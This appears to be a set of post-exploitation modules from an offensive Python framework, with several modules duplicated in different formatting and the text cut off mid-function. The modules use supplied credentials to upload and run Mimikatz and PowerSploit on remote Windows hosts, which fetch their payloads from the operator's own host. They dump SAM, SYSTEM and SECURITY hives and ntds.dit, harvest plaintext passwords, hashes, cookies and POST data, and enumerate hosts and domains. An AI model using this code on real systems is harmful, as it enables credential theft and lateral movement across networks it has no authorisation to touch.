def run(self):
# assume single set of credentials
username, password = self.creds[0]
out_file = self.required_options["out_file"][0]
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# delete the netview.exe binary
smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe")
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "netview.txt", out)
if out != "":
self.output += "[*] netview.exe results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] netview.exe execution failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# command to invoke finddllhijack and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
cmd = "C:\\Windows\\Temp\\finddllhijack.exe"
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
# execute finddllhijack and get the results
out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)
# cleanup
command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)
if out != "":
self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
outFile = self.required_options["out_file"][0]
if "\\" not in outFile:
# otherwise assume it's an absolute path
outFile = "C:\\Windows\\Temp\\" + outFile
for target in self.targets:
targetUsernames = []
command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" %{"p":outFile}
# execute the command
result = command_methods.executeCommand(target, username, password, command, triggerMethod)
# wait 20 seconds for "systeminfo" to run
print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
time.sleep(20)
# # grab the output file and delete it
out = smb.getFile(target, username, password, outFile, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out)
self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
out_file = self.required_options["out_file"][0]
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# delete the netview.exe binary
smb.deleteFile(target, username, password,
"C:\\Windows\\Temp\\netview.exe")
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "netview.txt", out)
if out != "":
self.output += "[*] netview.exe results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] netview.exe execution failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
fileName = self.required_options["fileName"][0]
deleteFile = self.required_options["delete"][0]
for target in self.targets:
print "\n [*] downloading '"+fileName+"' from "+target
# check if the user wants to delete the file after download
if deleteFile.lower() == "true":
out = smb.getFile(target, username, password, fileName, delete=True)
else:
out = smb.getFile(target, username, password, fileName, delete=False)
if out == "":
self.output += "[!] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' empty or doesn't exist\n"
# TODO: keep this "" or change to None if nothing is returned?
else:
# write the module out to the appropriate output location
saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out)
self.output += "[*] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' saved to "+saveName+"\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
trigger_method = self.required_options["trigger_method"][0]
for target in self.targets:
command = "echo %USERPROFILE%"
user_profile = command_methods.executeResult(target, username, password, command, trigger_method)
if user_profile == '':
self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n"
else:
user_profile = user_profile.strip(" \r\n")
recent_path1 = user_profile + "\\Recent"
recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent"
office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent"
office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent"
self.output += " [*] Enumerating recent files on %s \n" % target
for path in [recent_path1, recent_path2, office_path1, office_path2]:
files = smb.ls(target, username, password, path, path_error=False)
if len(files) > 0:
self.output += " [*] Found %s files \n" % len(files)
for file in files:
if file[-3:] == "lnk":
out = smb.getFile(target, username, password, path + "\\" + file, delete=False)
if out == '':
self.output += " [!] Failed retrieving : %s \n" % file
else:
save_path = helpers.saveModuleFile(self, target, file, out)
self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path)
try:
# parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252')
parsed_lnk = pylnker.parse_lnk(save_path)
details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk)
self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path)
except:
self.output += " [!] Error while parsing : %s \n" % save_path
def run(self):
# assume single set of credentials
username, password = self.creds[0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
triggerMethod = self.required_options["trigger_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-Mimikatz.ps1"
# Mimikatz command to run
scriptArguments = "Invoke-Mimikatz -Dumpcreds"
# trigger the powershell download on all targets
# ignore the architecture-independent cradle
delivery_methods.powershellHostTrigger(self.targets,
username,
password,
secondStagePath,
lhost,
scriptArguments,
triggerMethod=triggerMethod,
outFile=out_file,
ssl=use_ssl,
noArch=True)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
flag = self.required_options["flag"][0]
for target in self.targets:
# stop the ETW
stopCMD = "logman stop Status32 -ets"
command_methods.executeCommand(target, username, password, stopCMD,
triggerMethod)
# search for cookies or POST paramters
if flag.lower() == "post":
flag = "POST"
moduleFile = "post_params.txt"
else:
flag = "cookie added"
moduleFile = "cookies.txt"
# check the ETW results for the specified flag, and delete the dump file
parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""
# wait 20 seconds for everything to parse...if errors happen, increase this
parseResult = command_methods.executeResult(target,
username,
password,
parseCmd,
triggerMethod,
pause=20)
# delete the trace file
delCmd = "del C:\\Windows\\Temp\\status32.etl"
command_methods.executeCommand(target, username, password, delCmd,
triggerMethod)
if parseResult == "":
self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, moduleFile,
parseResult)
self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
triggerMethod = self.required_options["trigger_method"][0]
host_file = self.required_options["host_file"][0]
# the protected file on the host to copy
if host_file == "ntdis.dit":
host_file = "C:\\Windows\\ntds\\ntds.dit"
# Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit"
# local file to copy into
localFile = "C:\\Windows\\Temp\\"+host_file.split("\\")[-1]
# path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-NinjaCopy.ps1"
# pass the arguments to invoke ninja-copy
scriptArguments = "Invoke-NinjaCopy -Path \""+host_file+"\" -LocalDestination "+localFile
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, ssl=use_ssl)
for target in self.targets:
self.output += "[*] Powersploit:Invoke-NinjaCopy triggered using creds '"+username+":"+password+"' on "+target+"\n"
print "\n [*] Waiting 30s for NinjaCopy to run..."
time.sleep(30)
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target, username, password, localFile, delete=False)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, host_file.split("\\")[-1], out)
if out != "":
self.output += "[*] Powersploit:Invoke-NinjaCopy results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] Powersploit:Invoke-NinjaCopy failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
outFile = self.required_options["out_file"][0]
# wmis doesn't like net * /domain commands >_<
triggerMethod = "winexe"
if "\\" not in outFile:
# otherwise assume it's an absolute path
outFile = "C:\\Windows\\Temp\\" + outFile
for target in self.targets:
targetUsernames = []
command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % {
"p": outFile
}
# execute the command
result = command_methods.executeCommand(target, username, password,
command, triggerMethod)
# wait 20 seconds for commands to run
print helpers.color(
"\n [*] Waiting 20 seconds for enumeration commands to run on '"
+ target + "'",
status=True)
time.sleep(20)
# # grab the output file and delete it
out = smb.getFile(target, username, password, outFile, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target,
"enum_domain.txt", out)
self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
triggerMethod = self.required_options["trigger_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-Mimikatz.ps1"
# Mimikatz command to run
scriptArguments = "Invoke-Mimikatz -Dumpcreds"
# trigger the powershell download on all targets
# ignore the architecture-independent cradle
delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True)
print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
time.sleep(int(delay))
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# command to invoke finddllhijack and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
cmd = "C:\\Windows\\Temp\\finddllhijack.exe"
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$",
"\\Windows\\Temp\\", exePath)
# execute finddllhijack and get the results
out = command_methods.executeResult(target,
username,
password,
cmd,
triggerMethod,
pause=5)
# cleanup
command_methods.executeCommand(
target, username, password,
"del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target,
"finddllhijack.txt", out)
if out != "":
self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
flag = self.required_options["flag"][0]
for target in self.targets:
# stop the ETW
stopCMD = "logman stop Status32 -ets"
command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)
# search for cookies or POST paramters
if flag.lower() == "post":
flag = "POST"
moduleFile = "post_params.txt"
else:
flag = "cookie added"
moduleFile = "cookies.txt"
# check the ETW results for the specified flag, and delete the dump file
parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
# wait 20 seconds for everything to parse...if errors happen, increase this
parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)
# delete the trace file
delCmd = "del C:\\Windows\\Temp\\status32.etl"
command_methods.executeCommand(target, username, password, delCmd, triggerMethod)
if parseResult == "":
self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
else:
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
fileName = self.required_options["fileName"][0]
deleteFile = self.required_options["delete"][0]
for target in self.targets:
print "\n [*] downloading '" + fileName + "' from " + target
# check if the user wants to delete the file after download
if deleteFile.lower() == "true":
out = smb.getFile(target,
username,
password,
fileName,
delete=True)
else:
out = smb.getFile(target,
username,
password,
fileName,
delete=False)
if out == "":
self.output += "[!] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' empty or doesn't exist\n"
# TODO: keep this "" or change to None if nothing is returned?
else:
# write the module out to the appropriate output location
saveName = helpers.saveModuleFile(self, target,
fileName.split("\\")[-1],
out)
self.output += "[*] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' saved to " + saveName + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
outFile = self.required_options["out_file"][0]
# wmis doesn't like net * /domain commands >_<
triggerMethod = "winexe"
if "\\" not in outFile:
# otherwise assume it's an absolute path
outFile = "C:\\Windows\\Temp\\" + outFile
for target in self.targets:
targetUsernames = []
command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile}
# execute the command
result = command_methods.executeCommand(target, username, password, command, triggerMethod)
# wait 20 seconds for commands to run
print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
time.sleep(20)
# # grab the output file and delete it
out = smb.getFile(target, username, password, outFile, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
lhost = self.required_options["lhost"][0]
use_ssl = self.required_options["use_ssl"][0]
force_method = self.required_options["force_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# let's keep track of all credentials found
allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
for target in self.targets:
powershellInstalled = False
# check if we're forcing a particular grab method
if force_method.lower() == "binary":
powershellInstalled = False
elif force_method.lower() == "powershell":
powershellInstalled = True
else:
# check if we have a functional Powershell installation
powershellCommand = 'powershell.exe -c "$a=42;$a"'
powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
if powershellResult.strip() == "42":
powershellInstalled = True
if powershellInstalled:
# do powersploit combined file of invoke-mimikatz and powerdump
print helpers.color("\n [*] Powershell installed on " + target)
self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the combined Invoke-Mimikatz/powerdump powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
# trigger the powershell download on just this target
delivery_methods.powershellHostTrigger(
target,
username,
password,
secondStagePath,
lhost,
"",
triggerMethod="winexe",
outFile=out_file,
ssl=use_ssl,
noArch=True,
)
print "\n [*] Waiting " + delay + "s for Autograb to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# parse the powerdump component
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
if out != "":
self.output += (
"[*] Autograb.ps1 results using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " stored at "
+ saveFile
+ "\n"
)
else:
self.output += (
"[!] Autograb.ps1 failed using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " : no result file\n"
)
else:
# do reg.exe for hashdump and host/execute for mimikatz
print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
self.output += "[!] Powershell not installed on " + target + "\n"
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
# execute the registry save command
command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
print helpers.color("\n [*] Dumping hashes on " + target)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
# more error-checking here?
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/system", "w")
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/security", "w")
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/sam", "w")
f.write(samFile)
f.close()
# get all the hashes from these hives
out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# save the output file off
saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
self.output += (
"[*] dumped hashes (reg.exe) using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " saved to "
+ saveLocation
+ "\n"
)
# save these off to the universal list
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
# now, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
arch = "x86"
if "64" in archResult:
arch = "x64"
# now time for ze mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file
# host mimikatz.exe and trigger it ONLY on this particular machine
# so we can get the architecture correct
delivery_methods.hostTrigger(
target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
if out != "":
self.output += (
"[*] Mimikatz results using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " stored at "
+ saveFile
+ "\n"
)
else:
self.output += (
"[!] Mimikatz failed using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " : no result file\n"
)
if len(allhashes) > 0:
allhashes = sorted(set(allhashes))
self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# let's keep track of ALL hashes found
allHashes = ""
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
for target in self.targets:
print helpers.color("\n [*] Dumping hashes on " + target)
# execute the registry save command
command_methods.executeCommand(target, username, password,
regSaveCommand, triggerMethod)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\system",
delete=False)
securityFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\security",
delete=False)
samFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\sam",
delete=False)
error = False
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open('/tmp/system', 'w')
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/security', 'w')
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open('/tmp/sam', 'w')
f.write(samFile)
f.close()
if not error:
# get all the hashes from these hives
hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# add the hashes to our global list
allHashes += hashes
# save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
saveLocation = helpers.saveModuleFile(self, target,
"hashes.txt", hashes)
self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
else:
self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"
if allHashes != "":
# get all non-empty hashes, uniquify and sort them
allHashes = [p.lower() for p in allHashes.split("\n") if p != '']
allHashes = sorted(set(allHashes))
self.output += "[*] All unique hashes:\n" + "\n".join(
allHashes) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# let's keep track of ALL plaintext credentials found
allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []
for target in self.targets:
print "\n [*] Executing mimikatz on " + target
# first, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username,
password, archCommand,
triggerMethod)
# if there's a failure in this initial execution, go to the next target
if "error" in archResult:
self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
continue
arch = "x86"
if "64" in archResult: arch = "x64"
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# now time for mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
delivery_methods.hostTrigger(target,
username,
password,
mimikatzPath,
lhost,
triggerMethod=triggerMethod,
exeArgs=exeArgs)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
if out != "":
self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
# append the total mimikatz creds if we have any
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(
allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(
allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# let's keep track of ALL hashes found
allHashes = ""
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
for target in self.targets:
print helpers.color("\n [*] Dumping hashes on " + target)
# execute the registry save command
command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
error = False
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open("/tmp/system", "w")
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/security", "w")
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open("/tmp/sam", "w")
f.write(samFile)
f.close()
if not error:
# get all the hashes from these hives
hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# add the hashes to our global list
allHashes += hashes
# save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)
self.output += (
"[*] dumped hashes (reg.exe) using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " saved to "
+ saveLocation
+ "\n"
)
else:
self.output += (
"[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"
)
if allHashes != "":
# get all non-empty hashes, uniquify and sort them
allHashes = [p.lower() for p in allHashes.split("\n") if p != ""]
allHashes = sorted(set(allHashes))
self.output += "[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
lhost = self.required_options["lhost"][0]
use_ssl = self.required_options["use_ssl"][0]
force_method = self.required_options["force_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# let's keep track of all credentials found
